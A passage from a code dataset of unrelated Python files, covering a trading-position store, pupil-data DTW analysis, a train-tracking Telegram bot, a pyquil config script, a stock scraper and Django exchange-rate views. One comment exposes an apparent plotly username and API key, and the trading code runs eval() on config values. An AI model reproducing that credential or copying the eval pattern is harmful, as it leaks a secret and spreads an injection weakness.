if 'price' in passed_fields:\n self.price = values['price']\n if 'time' in passed_fields:\n self.time = values['time']\n if 'volume' in passed_fields:\n self.volume = values['volume']\n if 'direction' in passed_fields:\n self.direction = values['direction']\n if 'status' in passed_fields:\n self.status = values['status']\n return True\n\n\nclass TradeDetailsRecord(GenConfig):\n def __init__(self, cfgFile, logger):\n \"\"\"交易策略配置信息接口\n :raise TradeDetailsRecordError: 初始化仓位数据错误,将会抛出异常,调用时需捕获该异常\n \"\"\"\n super(TradeDetailsRecord, self).__init__(cfgFile)\n self.cfgFile = cfgFile\n self.defaultSec = \"all\"\n self.logger = logger\n # 初始化仓位信息\n self.__positions = []\n if not self.load_pos_details():\n raise TradeDetailsRecordError(f\"加载pos_details出错!\")\n # 交易方向\n self.__direction = self.get_property('current_direction', 0)\n if self.__direction is None:\n raise TradeDetailsRecordError(f\"加载current_direction出错!\")\n\n def __valid_pos_index(self, num):\n \"\"\"返回是否为有效的仓位索引\n :param num: 仓位索引\n :return: True|False\n \"\"\"\n if num < 1 or num > len(self.__positions):\n return False\n return True\n\n def load_pos_details(self):\n \"\"\"加载仓位信息\n :return: True|False\n \"\"\"\n ret = True\n self.__positions.clear()\n pos_details = self.getSecOption(self.defaultSec, 'pos_details')\n if not pos_details:\n # 仓位为空\n return ret\n\n try:\n pos_details = eval(pos_details)\n for val in pos_details:\n pos = Position()\n if not pos.assign(val):\n self.logger.error(f\"无法解析仓位信息 val: {val}\")\n ret = False\n break\n self.__positions.append(pos)\n except Exception as e:\n self.logger.error(f\"转换时出现错误:pos_details: {pos_details}; \"\n f\"exp: {traceback.format_exc(e)}\")\n ret = False\n return ret\n\n def save_pos_details(self):\n \"\"\"保存仓位信息\"\"\"\n pos_details = [str(pos) for pos in self.__positions]\n self.setSecOption(self.defaultSec, 'pos_details', str(pos_details))\n\n def get_cur_pos_num(self):\n \"\"\"返回当前仓位\"\"\"\n return len(self.__positions)\n\n def get_position(self, num=None):\n \"\"\"返回第num个仓位,num从1开始记\n :param num: 仓位索引,默认最后一个仓位\n :return: 索引对应仓位\n \"\"\"\n # 默认(num为None)返回最后一个仓位\n if num is None:\n num = self.get_cur_pos_num()\n\n if not self.__valid_pos_index(num):\n self.logger.error(f\"仓位超出范围:num {num}, current {len(self.__positions)}\")\n return None\n\n return self.__positions[num-1]\n\n def set_position(self, num, values):\n \"\"\"\n 更新仓位数据\n :param num: 仓位索引\n :param dict values: 赋值数据\n :return: True|False\n \"\"\"\n if not self.__valid_pos_index(num):\n self.logger.error(f\"仓位超出范围:num {num}, current {len(self.__positions)}\")\n return False\n\n pos = self.__positions[num-1]\n if not pos.assign(values):\n return False\n self.save_pos_details()\n return True\n\n def add_position(self, pos):\n \"\"\"添加新仓位\n :param pos: Position class实例\n \"\"\"\n self.__positions.append(pos)\n self.save_pos_details()\n\n def del_position(self, num):\n \"\"\"删除仓位,num从1开始记\n :param num: 仓位索引,默认最后一个仓位\n :return: 正常返回已删除的仓位信息,否则返回None\n \"\"\"\n ret = None\n # 默认(num为None)返回最后一个仓位\n if num is None:\n num = self.get_cur_pos_num()\n\n if not self.__valid_pos_index(num):\n self.logger.error(f\"仓位超出范围:num {num}, current {len(self.__positions)}\")\n return ret\n\n ret = self.__positions.pop(num-1)\n self.save_pos_details()\n return ret\n\n def clear_position(self):\n \"\"\"清除所有仓位\"\"\"\n self.__positions.clear()\n self.save_pos_details()\n\n def get_direction(self):\n \"\"\"得到交易方向\n :return: 0 -> 无交易;1 -> 买多;-1 -> 卖空\n \"\"\"\n return self.__direction\n\n def save_direction(self, direction):\n self.__direction = direction\n self.setSecOption(self.defaultSec, 'current_direction', str(direction))\n\n def get_property(self, prop_name, def_ret):\n \"\"\"从TDR文件读取属性值\n :param prop_name: 属性名称\n :param def_ret: 默认返回值\n :return: 正常返回属性值,错误返回None\n \"\"\"\n value = self.getSecOption(self.defaultSec, prop_name)\n if value is None:\n return def_ret\n\n try:\n ret = eval(value)\n except Exception as e:\n self.logger.error(f\"转换时出现错误:{prop_name}: {value}; exp: {traceback.format_exc(e)}\")\n ret = None\n return ret\n\n def save_property(self, prop_name, value):\n \"\"\"保存属性值到TDR\n :param prop_name: 属性名称\n :param value: 属性值\n :return:\n \"\"\"\n self.setSecOption(self.defaultSec, prop_name, str(value))\n","sub_path":"ctp/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":11863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467184718","text":"from dtaidistance import dtw\nimport numpy as np\nimport pickle\nfrom dataAnalysis.analysisData import AnalysisData\nan= AnalysisData()\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import DataFrame\n\ndef check_similarity(seriesDTW, seriesType):\n distances=[]\n for i in seriesType:\n distances.append(distanceOfSeries(seriesDTW, i))\n return distances\n\ndef distanceOfSeries(s1, s2):\n return dtw.distance(s1, s2)\n\ndef getSeries(type):\n indi_data = an.evaluateIndividual('../FinalEvaluation/data/individual3/' + str(1) + '/augmented_train/train.json')\n\n series = []\n typeval = [data['pupilListSmoothed'][:291] for data in indi_data if type == data['type']]\n peaks_valleys = an.detectPeakandValley(np.array(\n [tuple(data['pupilListSmoothed'][:291]) for data in indi_data if type == data['type']]), range(291))\n for i in range(len(typeval)):\n y_val = typeval[i]\n y_val = np.array(y_val)\n lowestValley = np.where(y_val == min(y_val))[0][0]\n highestPeak = np.where(y_val == max(y_val[lowestValley:]))[0][0]\n peaks_valleys = np.concatenate(([highestPeak - lowestValley], [0]))\n x_value = np.array(range(lowestValley, highestPeak + 1))\n y_val = y_val[lowestValley: highestPeak + 1]\n series.append(y_val)\n return series\n\ndef getDTWseries(file):\n with open(file, 'rb') as f:\n s2=pickle.load( f)\n return s2\n\ndef get_testData(type):\n indi_data = an.evaluateIndividual('../FinalEvaluation/data/individual3/' + str(1) + '/augmented_train/test.json')\n\n series = []\n typeval = [data['pupilListSmoothed'][:291] for data in indi_data if type == data['type']]\n peaks_valleys = an.detectPeakandValley(np.array(\n [tuple(data['pupilListSmoothed'][:291]) for data in indi_data if type == data['type']]), range(291))\n for i in range(len(typeval)):\n y_val = typeval[i]\n y_val = np.array(y_val)\n lowestValley = np.where(y_val == min(y_val))[0][0]\n highestPeak = np.where(y_val == max(y_val[lowestValley:]))[0][0]\n peaks_valleys = np.concatenate(([highestPeak - lowestValley], [0]))\n x_value = np.array(range(lowestValley, highestPeak + 1))\n y_val = y_val[lowestValley: highestPeak + 1]\n series.append(y_val)\n return series\ndef smoothSeries(s):\n\n series = DataFrame (s,columns=['Column_Name'])\n # Tail-rolling average transform\n rolling = series.rolling(window=3)\n rolling_mean = rolling.mean()\n return rolling_mean\ndef classify():\n seriesType= getSeries(0)\n seriesDTW= getDTWseries('DTW_obj/DTW_Train0_.obj')\n d_bw_0_DTW= check_similarity(seriesDTW, seriesType)\n #print(d_bw_0_DTW)\n\n seriesType = getSeries(1)\n seriesDTW = getDTWseries('DTW_obj/DTW_Train1_.obj')\n d_bw_1_DTW = check_similarity(seriesDTW, seriesType)\n #print(d_bw_1_DTW)\n\n seriesType = getSeries(2)\n seriesDTW = getDTWseries('DTW_obj/DTW_Train2_.obj')\n d_bw_2_DTW = check_similarity(seriesDTW, seriesType)\n #print(d_bw_2_DTW)\n\n seriesType = getSeries(2)\n seriesDTW = getDTWseries('DTW_obj/DTW_Train1_.obj')\n diff_bw_12_DTW = check_similarity(seriesDTW, seriesType)\n #print(diff_bw_12_DTW)\n\n ser0=getDTWseries('DTW_obj/DTWFull_Train0_.obj')\n ser1 = getDTWseries('DTW_obj/DTWFull_Train2_.obj')\n ser2 = getDTWseries('DTW_obj/DTWFull_Train2_.obj')\n\n sim_bw_12 = distanceOfSeries(ser1, ser2)\n sim_bw_10 = distanceOfSeries(ser1, ser0)\n print(sim_bw_12)\n print(sim_bw_10)\n\n #plt.plot(sim_bw_12, color='red', label='Negative Vs Neutral')\n #plt.plot(ser1, color='blue', label='Neutral')\n #plt.plot(sim_bw_10, color='green', label='Positive Vs Neutral')\n #plt.figure()\n #plt.plot(smoothSeries(d_bw_2_DTW), color='red', label='Negative')\n #plt.plot(smoothSeries(d_bw_1_DTW), color='blue', label='Neutral')\n #plt.plot(smoothSeries(d_bw_0_DTW), color='green', label='Positive')\n #plt.legend()\n plt.figure(figsize=(10, 6))\n plt.plot(d_bw_2_DTW, color='red', label='Negative')\n plt.plot(d_bw_1_DTW, color='blue', label='Neutral')\n plt.plot(d_bw_0_DTW, color='green', label='Positive')\n plt.legend(loc='best')\n plt.show()\n\nclassify()","sub_path":"dataAnalysis/ClassifyDTWdist.py","file_name":"ClassifyDTWdist.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12570807","text":"\n\n#calss header\nclass _CHEMISTRY():\n\tdef __init__(self,): \n\t\tself.name = \"CHEMISTRY\"\n\t\tself.definitions = [u'the scientific study of the basic characteristics of substances and the ways in which they react or combine: ', u'the basic characteristics of a substance and the ways in which it reacts or combines with other substances: ', u'a quality that exists when two people understand and are attracted to each other: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_chemistry.py","file_name":"_chemistry.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443353822","text":"import API\nimport Bot\nfrom CONFIG import TOKEN\nfrom Callback import *\nfrom Inlinemode import *\n\nimport time\n\nimport sqlite3\nconn = sqlite3.connect('OrarioTreni.db')\nc = conn.cursor()\nAPI.db.creaTutto()\n\nimport botogram\nbot = botogram.create(TOKEN)\n\nimport logging\nlogger = logging.getLogger(\"tracciamento\")\n\nformat = \"%(asctime)s [%(levelname)s]: %(message)s\"\nlevel = logging.DEBUG\nlogging.basicConfig(format=format, level=level)\n\ndef tracciamento():\n c.execute('''SELECT * FROM tracciamento''')\n rows = c.fetchall()\n if not rows:\n logging.debug(\"Nessun treno da tracciare\")\n return\n\n for res in rows:\n request_id = str(res[0])\n user_id = res[1]\n id_treno = res[2]\n solo_oggi = res[3]\n stazione_ultimo_rilevamento = res[4]\n random_string = res[5]\n\n data, success, error = API.orarioTreni.cercaTreno(str(id_treno))\n\n if data == None:\n continue\n\n stazione_attuale = data['stazioneUltimoRilevamento']\n if stazione_attuale == \"--\":\n stazione_attuale = data['origine']\n\n logging.info(\"Processando la richiesta numero {} del treno {} da {}\".format(request_id, id_treno, user_id))\n\n if stazione_ultimo_rilevamento == data['destinazione'] and stazione_ultimo_rilevamento == data['stazioneUltimoRilevamento']:\n continue\n\n if stazione_ultimo_rilevamento == data['destinazione'] and stazione_attuale == data['origine']:\n c.execute('''UPDATE tracciamento SET stazione_ultimo_rilevamento=? WHERE request_id=?''', (stazione_attuale, request_id,))\n conn.commit()\n continue\n\n if stazione_attuale != stazione_ultimo_rilevamento:\n logging.info(\"Richiesta numero {}, il treno ha cambiato stazione da {} a {}\".format(id_treno, stazione_ultimo_rilevamento, stazione_attuale))\n c.execute('''UPDATE tracciamento SET stazione_ultimo_rilevamento=? WHERE request_id=?''', (stazione_attuale, request_id,))\n text = (\n \"🚦Traccia treno [BETA]\"\n \"\\n🚅Il treno {treno} ha cambiato stazione!\"\n \"\\n🚉{precedente} ➡️ 🚉{successiva}\"\n \"\\n🕒Ritardo: {ritardo}m\".format(treno=id_treno, precedente=stazione_ultimo_rilevamento, successiva=stazione_attuale, ritardo=data['ritardo'])\n )\n\n if stazione_attuale in str(data['fermate']):\n numero_fermata = -1\n for dict in data['fermate']:\n numero_fermata = numero_fermata + 1\n if stazione_attuale == dict['stazione']:\n break\n\n try:\n fermata = API.Messaggi.fermata(data, numero_fermata)\n text = text + \"\\n\\n\" + fermata\n except Exception as e:\n logger.error(\"Errore nella formattazione della fermata: {}\".format(e))\n text = text + \"\\n\\n\" + \"Errore sconosciuto. Contattare lo sviluppatore. {}\".format(e)\n\n text = text + \"\\n➡️Clicca qui per seguire tutto il tracciamento: #tracciamento{N}\".format(N=random_string)\n\n else:\n text = text + \"\\n\\n\" + \"Il treno non ferma in questa fermata\"\n text = text + \"\\n\\n➡️Clicca qui per seguire tutto il tracciamento: #tracciamento{N}\".format(N=random_string)\n\n bot.api.call(\"sendMessage\", {\n \"chat_id\": user_id, \"text\": text, \"parse_mode\": \"HTML\", \"reply_markup\":\n '{\"inline_keyboard\": [[{\"text\": \"❌ Disattiva le notifiche\", \"callback_data\": \"stop_tracciamentoT'+request_id+'\"}]]}'\n })\n\n if stazione_attuale == data['destinazione']:\n if solo_oggi == True:\n c.execute('DELETE FROM tracciamento WHERE request_id=?', (request_id,))\n logging.info(\"Utente {} tracciamento cancellato {}\".format(user_id, request_id))\n conn.commit()\n\n text = (\n \"🚦Traccia treno [BETA]\"\n \"\\nIl treno {treno} è arrivato a destinazione con un ritardo di {ritardo} minuti!\"\n \"\\nHo interrotto il tracciamento\".format(treno=id_treno, ritardo=data['ritardo'])\n )\n bot.api.call(\"sendMessage\", {\n \"chat_id\": user_id, \"text\": text, \"parse_mode\": \"HTML\"\n })\n\n if solo_oggi == False:\n c.execute('''UPDATE tracciamento SET stazione_ultimo_rilevamento=? WHERE request_id=?''', (data['destinazione'], request_id,))\n text = (\n \"🚦Traccia treno [BETA]\"\n \"\\nIl treno {treno} è arrivato a destinazione con un ritardo di {ritardo} minuti\"\n \"\\nDomani riceverai ancora notifiche sul treno\".format(treno=id_treno, ritardo=data['ritardo'])\n )\n bot.api.call(\"sendMessage\", {\n \"chat_id\": user_id, \"text\": text, \"parse_mode\": \"HTML\", \"reply_markup\":\n '{\"inline_keyboard\": [[{\"text\": \"❌ Disattiva le notifiche\", \"callback_data\": \"stop_tracciamentoT'+request_id+'\"}]]}'\n })\n\n\n conn.commit()\n\nwhile True:\n try:\n tracciamento()\n except Exception as e:\n logging.exception(e)\n time.sleep(5)\n","sub_path":"Tracciamento.py","file_name":"Tracciamento.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233512649","text":"##############################################################################\n# Copyright 2016-2017 Rigetti Computing\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nimport re\nimport os\n\nfrom six.moves import input\n\nfrom pyquil.api._config import PyquilConfig\n\n\ndef main():\n print(\"Welcome to PyQuil!\")\n print(\"Enter the required information below for Forest connections.\")\n print(\"If you haven't signed up yet you will need to do so first at http://forest.rigetti.com\")\n\n while True:\n key = input(\"Forest API Key: \")\n key_ma = re.match(r'^\\s*(\\w{40})\\s*$', key)\n if key_ma:\n # Looks like a real key\n key = key_ma.group(1)\n break\n\n print(\"That doesn't look like a valid API key. Try again or use Ctrl-C to quit\")\n\n while True:\n user = input(\"User ID: \")\n user_ma = re.match(r'^\\s*([a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-'\n r'[a-fA-F0-9]{4}-[a-fA-F0-9]{12})\\s*$', user)\n if user_ma:\n # Looks like a real user id\n user = user_ma.group(1)\n break\n\n print(\"That doesn't look like a valid User ID. Try again or use Ctrl-C to quit\")\n\n path = PyquilConfig.DEFAULT_PYQUIL_CONFIG_PATH\n\n if os.path.exists(path):\n # Make a backup by appending .bak(i) where we increment\n # i until the desired backup filename doesn't already exist\n i = 1\n dn = os.path.dirname(path)\n bn = os.path.basename(path)\n while True:\n bak_path = os.path.join(dn, \"{bn}.bak{i}\".format(bn=bn, i=i))\n if not os.path.exists(bak_path):\n break\n i += 1\n\n print(\"I already found a file at {path}. Creating a backup at {bak_path}.\"\n .format(path=path, bak_path=bak_path))\n\n os.rename(path, bak_path)\n\n with open(path, 'w') as f:\n f.write(\"[\" + PyquilConfig.SECTION + \"]\\n\")\n f.write(PyquilConfig.API_KEY + \": \" + key + \"\\n\")\n f.write(PyquilConfig.USER_ID + \": \" + user + \"\\n\")\n\n print(\"Pyquil config file created at '%s'\" % path)\n print(\"If you experience any problems see the guide at https://go.rigetti.com/getting-started\")\n","sub_path":"pyquil/setup/pyquil_config_setup.py","file_name":"pyquil_config_setup.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323490332","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 3 12:10:05 2019\n\n@author: Artesia\n\"\"\"\nimport os\nimport shutil\n\nimport pytest\n\npathname = os.path.join('examples', 'notebooks')\n# get list of notebooks to run\nfiles = [f for f in os.listdir(pathname) if f.endswith('.ipynb')]\n\ntestdir = 'build'\nif os.path.isdir(os.path.join(pathname, testdir)):\n shutil.rmtree(os.path.join(pathname, testdir))\nos.mkdir(os.path.join(pathname, testdir))\n\n\n@pytest.mark.parametrize(\"file\", files)\ndef test_notebook(file):\n cwd = os.getcwd()\n\n os.chdir(pathname)\n if file not in []:\n try:\n # run autotest on each notebook\n cmd = 'jupyter ' + 'nbconvert ' + \\\n '--ExecutePreprocessor.timeout=600 ' + \\\n '--to ' + 'notebook ' + \\\n '--execute ' + '\"{}\" '.format(file) + \\\n '--output-dir ' + '{} '.format(testdir)\n ival = os.system(cmd)\n msg = 'could not run {}'.format(file)\n assert ival == 0, msg\n assert os.path.isfile(os.path.join(testdir, file)), msg\n except Exception as e:\n os.chdir(cwd)\n raise Exception(e)\n os.chdir(cwd)\n\n\nif __name__ == '__main__':\n for file in files:\n test_notebook(file)\n","sub_path":"tests/test_notebooks.py","file_name":"test_notebooks.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300776100","text":"from scraper.common import ScrapeResult, Scraper, ScraperFactory\n\n\nclass PlayStationScrapeResult(ScrapeResult):\n def parse(self):\n alert_subject = 'In Stock'\n alert_content = ''\n\n product = self.soup.body.find('div', class_='productHero-info')\n if not product:\n tag = self.soup.body.find('div', id='challenge-container')\n if tag:\n self.logger.warning('access denied, got a CAPTCHA')\n else:\n self.logger.warning(f'missing product info div: {self.url}')\n return\n\n # get name of product\n tag = product.find('h2')\n if tag:\n alert_content += tag.text.strip() + '\\n'\n else:\n self.logger.warning(f'missing title: {self.url}')\n\n # get listed price\n tag = product.select_one('div.price-text > span.product-price')\n price_str = self.set_price(tag)\n if price_str:\n alert_subject = f'In Stock for {price_str}'\n\n # check for add to cart button\n tag = product.select_one('div.button-placeholder > button.add-to-cart')\n if tag and 'add to cart' in tag.text.lower():\n self.alert_subject = alert_subject\n self.alert_content = f'{alert_content.strip()}\\n{self.url}'\n\n\n@ScraperFactory.register\nclass PlayStationScraper(Scraper):\n @staticmethod\n def get_domain():\n return 'playstation'\n\n @staticmethod\n def get_driver_type():\n return 'selenium'\n\n @staticmethod\n def get_result_type():\n return PlayStationScrapeResult\n","sub_path":"src/scraper/playstation.py","file_name":"playstation.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592271350","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom DataFormats.FWLite import Events, Handle\n\nclass HandleData(Handle):\n def __init__(self,product,label):\n Handle.__init__(self,product)\n self.label = str(label)\n def get(self,event):\n event.getByLabel(self.label,self)\n \nclass EvtHandles:\n def __init__(self,products=[],verbose=False):\n for product in products:\n if verbose:\n print(\"adding handle {name}, {type}, {tag}\".format(**product))\n setattr(self,product['name'],HandleData(product['type'],product['tag']))\n \nclass EvtData:\n def __init__(self,products=[],verbose=False):\n self.handles = EvtHandles(products,verbose)\n self.event = None\n self.got_handles = []\n\n def get_handles(self,event,on_demand=True):\n \"\"\" \n gets the handles for the event\n if on_demand=True it doesnt actually get the handles and instead\n waits for something to request the handle\n \"\"\" \n self.got_handles = []\n self.event = event\n if not on_demand:\n for name,handle in vars(self.handles).iteritems(): \n handle.get(event)\n self.got_handles.append(name)\n\n def get_handle(self,name):\n \"\"\" \n gets the product handle with name \"name\"\n now checks to ensure the handles are got first and not gets them\n \"\"\" \n \n handle = getattr(self.handles,name)\n if not name in self.got_handles:\n handle.get(self.event)\n self.got_handles.append(name)\n\n return handle\n \n def get(self,name):\n \"\"\" \n gets the product with name \"name\"\n now checks to ensure the handles are got first and not gets them\n \"\"\" \n handle = self.get_handle(name)\n \n try:\n return handle.product()\n except RuntimeError:\n return None\n\n \nclass EvtWeights:\n def __init__(self,input_filename,lumi=0.075):\n if input_filename: \n with open(input_filename,'r') as f:\n self.data = json.load(f)\n else:\n self.data = {} \n self.warned = []\n self.lumi = lumi #luminosity to weight to in pb\n\n def weight_from_name(self,dataset_name):\n if dataset_name in self.data:\n val = self.data[dataset_name]\n return val['xsec']/val['nrtot']*self.lumi\n else:\n if dataset_name not in self.warned:\n self.warned.append(dataset_name) \n print(\"{} not in weights file, returning weight 1\".format(dataset_name))\n return 1.\n\n def weight_from_evt(self,event):\n filename = event.getTFile().GetName().split(\"/\")[-1]\n dataset_name = re.search(r'(.+)(_\\d+_EDM.root)',filename).groups()[0]\n return self.weight_from_name(dataset_name)\n\ndef add_product(prods,name,type_,tag):\n prods.append({'name' : name, 'type' : type_, 'tag' : tag})\n\nstd_products=[]\nadd_product(std_products,\"egtrigobjs\",\"std::vector\",\"hltEgammaHLTExtraL1Seeded\")\nadd_product(std_products,\"genparts\",\"std::vector\",\"genParticles\")\n\nphaseII_products = []\nadd_product(phaseII_products,\"egtrigobjs\",\"std::vector\",\"hltEgammaHLTExtra\")\nadd_product(phaseII_products,\"genparts\",\"std::vector\",\"genParticles\")\nadd_product(phaseII_products,\"l1trks\",\"std::vector,Phase2TrackerDigi,edm::refhelper::FindForDetSetVector > > >\",\"hltEgammaHLTPhase2Extra\")\nadd_product(phaseII_products,\"trkpart\",\"std::vector\",\"hltEgammaHLTPhase2Extra\")\nadd_product(phaseII_products,\"hcalhits\",\"edm::SortedCollection >\",\"hltEgammaHLTExtra\")\nadd_product(phaseII_products,\"trksv0\",\"std::vector\",\"hltEgammaHLTExtra:generalTracksV0\")\nadd_product(phaseII_products,\"trksv2\",\"std::vector\",\"hltEgammaHLTExtra:generalTracksV2\")\nadd_product(phaseII_products,\"trksv6\",\"std::vector\",\"hltEgammaHLTExtra:generalTracksV6\")\n","sub_path":"python/EvtData.py","file_name":"EvtData.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"629222639","text":"# -*- coding:utf-8 -*-\n__author__ = 'Xie Zhaoheng'\n__date__ = '2017/8/23 15:43'\nimport json\nimport datetime\nimport decimal\nimport os\n\nclass CJsonEncoder(json.JSONEncoder):\n \"\"\"\n 如果时间类型是 datetime.date 或者 str 类型,指定该方法处理\n \"\"\"\n def default(self, obj):\n if isinstance(obj, datetime.datetime):\n #return obj.strftime('%Y-%m-%d %H:%M:%S')\n return obj.strftime('%Y-%m-%d')\n elif isinstance(obj, datetime.date):\n return obj.strftime(\"%Y-%m-%d\")\n else:\n return json.JSONEncoder.default(self, obj)\n\n\nif __name__ == \"__main__\":\n # item时间类型是 datetime.date\n item = {'comment_nums': 0, 'create_date': datetime.date(2017, 8, 3)}\n lines = json.dumps(dict(item), ensure_ascii=False, cls=CJsonEncoder) + \"\\n\"\n print('lines: ', lines)\n\n # item时间类型是 str\n item_2 = {'comment_nums': 3, 'create_date': '2017/8/3'}\n lines_2 = json.dumps(dict(item), ensure_ascii=False, cls=CJsonEncoder) + \"\\n\"\n print('lines_2: ', lines_2)\n","sub_path":"muke_spider/utils/JsonMy.py","file_name":"JsonMy.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651193826","text":"from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom .models import Question, Valuta_kurs, Valuta\nfrom django.shortcuts import get_object_or_404, render, render_to_response\nfrom django.utils import translation\nfrom django.utils.translation import LANGUAGE_SESSION_KEY, ugettext as _\nimport requests\nimport pandas as pd\nimport datetime as DT\nimport matplotlib.pyplot as plt\nimport re\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport plotly\n\n# import pickle\n# from pymemcache import Client\n\nnow = DT.datetime.now()\ntoday = DT.date.today()\nweek_ago = today - DT.timedelta(days=7)\n\n\ndef index(request):\n if request.user.is_authenticated and request.user.is_staff:\n username = request.user\n else:\n username = 'Аноним'\n return render_to_response('my_exrate/index.html',\n {'user': username, 'login_form': request.user.is_authenticated})\n\n\ndef user_login(request):\n user = authenticate(username=request.POST.get('username'),\n password=request.POST.get('password'))\n if user is None:\n return render_to_response('my_exrate/login.html', {})\n else:\n login(request, user)\n\n return HttpResponseRedirect('/')\n\n\ndef user_logout(request):\n if request.user.is_authenticated:\n logout(request)\n return HttpResponseRedirect('/')\n\n\ndef register(request):\n return render_to_response('my_exrate/register.html')\n\n\ndef user_register(request):\n user = User.objects.create_user(username=request.POST.get('username'), email=request.POST.get('email'),\n password=request.POST.get('password'), is_staff=True)\n login(request, user)\n return HttpResponseRedirect('/')\n\n\ndef user_check(request):\n usr = 'ok'\n eml = 'ok'\n if re.search('^[a-z0-9_-]{3,16}$', request.POST.get('username')) == None:\n usr = 'user_not_check'\n if User.objects.filter(username=request.POST.get('username')).exists():\n usr = 'user_exists'\n\n if not re.match(r\"^[A-Za-z0-9\\.\\+_-]+@[A-Za-z0-9\\._-]+\\.[a-zA-Z0-9]*$\", request.POST.get('email')):\n eml = 'email_not_check'\n if User.objects.filter(email=request.POST.get('email')).exists():\n eml = 'email_exists'\n\n response = {'user': usr, 'email': eml}\n\n return JsonResponse(response)\n\n\n# построить график курсов -- amcharts\ndef amcharts(request, Cur_ID):\n chartData = \"\"\n if request.user.is_authenticated:\n # if request.user.is_authenticated and request.user.view('my_exrate.valuta'):\n for val_1 in Valuta.objects.filter(Cur_ID=Cur_ID):\n # for val_1 in Valuta.objects.all():\n x = []\n y = []\n i = 0\n quot = \"\\\"\"\n for rate_1 in Valuta_kurs.objects.filter(Cur_ID=val_1.Cur_ID):\n # chartData += prefix\n chartData += \"{\\n\"\n chartData += \"date:\" + quot + str(rate_1.Date.year) + \"-\" + str(\n '{:02d}'.format(rate_1.Date.month)) + \"-\" + str(\n '{:02d}'.format(rate_1.Date.day)) + quot + \",\\n\"\n chartData += \"value:\" + str(rate_1.Cur_OfficialRate) + \"\\n}\"\n i = i + 1\n chartData += \",\"\n # print(chartData)\n else:\n return render_to_response('my_exrate/amcharts.html', {})\n return render(request, 'my_exrate/amcharts.html', {'header': val_1.Cur_Name, 'chartData': chartData})\n\n\n# построить график курсов -- matplotlib\ndef matplotlib(request, Cur_ID):\n if request.user.is_authenticated:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for val_1 in Valuta.objects.filter(Cur_ID=Cur_ID):\n ax.set_title(val_1.Cur_Name)\n # for val_1 in Valuta.objects.all():\n x = []\n y = []\n for rate_1 in Valuta_kurs.objects.filter(Cur_ID=val_1.Cur_ID):\n x.append(DT.datetime(year=rate_1.Date.year, month=rate_1.Date.month, day=rate_1.Date.day))\n y.append(rate_1.Cur_OfficialRate)\n # x - Date y - Cur_OfficialRate label - Cur_Abbreviation\n ax.plot(x, y, label=val_1.Cur_Abbreviation)\n ax.legend(loc='lower right') # так же указываем положение легенды\n for label in ax.xaxis.get_ticklabels():\n # цвет подписи деленений оси OX\n label.set_color('blue')\n # поворот подписей деленений оси OX\n label.set_rotation(30)\n # размер шрифта подписей делений оси OX\n label.set_fontsize(8)\n plt.savefig('my_exrate/static/image/foo.png')\n plt.close()\n # image_data = open(\"my_exrate/static/image/foo.png\", \"rb\").read()\n else:\n return render_to_response('my_exrate/matplotlib.html', {})\n\n return render(request, 'my_exrate/matplotlib.html')\n\n\n# построить график курсов -- plotly\n# import plotly\n# plotly.tools.set_credentials_file(username='vitaly.by', api_key='T13Oh0V6SNXmdJK7rouH')\ndef plotly(request, Cur_ID):\n chartData = \"\"\n if request.user.is_authenticated:\n for val_1 in Valuta.objects.filter(Cur_ID=Cur_ID):\n x = []\n y = []\n for rate_1 in Valuta_kurs.objects.filter(Cur_ID=val_1.Cur_ID):\n x.append(DT.datetime(year=rate_1.Date.year, month=rate_1.Date.month, day=rate_1.Date.day))\n y.append(rate_1.Cur_OfficialRate)\n data = [go.Scatter(x=x, y=y)]\n py.iplot(data, filename='plotly_chart', sharing='public', auto_open=False)\n else:\n return render_to_response('my_exrate/plotly.html', {})\n return render(request, 'my_exrate/plotly.html', {'header': val_1.Cur_Name})\n\n\n# скачать файл csv\ndef csv_file(request):\n import csv\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename = \"file_rates\"'\n writer = csv.writer(response)\n writer.writerow(['First row', 'Foo', 'Bar', 'Baz'])\n writer.writerow(['Second row', 'A', 'B', 'C', '\"Testing\"'])\n\n return response\n\n\ndef rate_insert(request):\n kurs_USD = 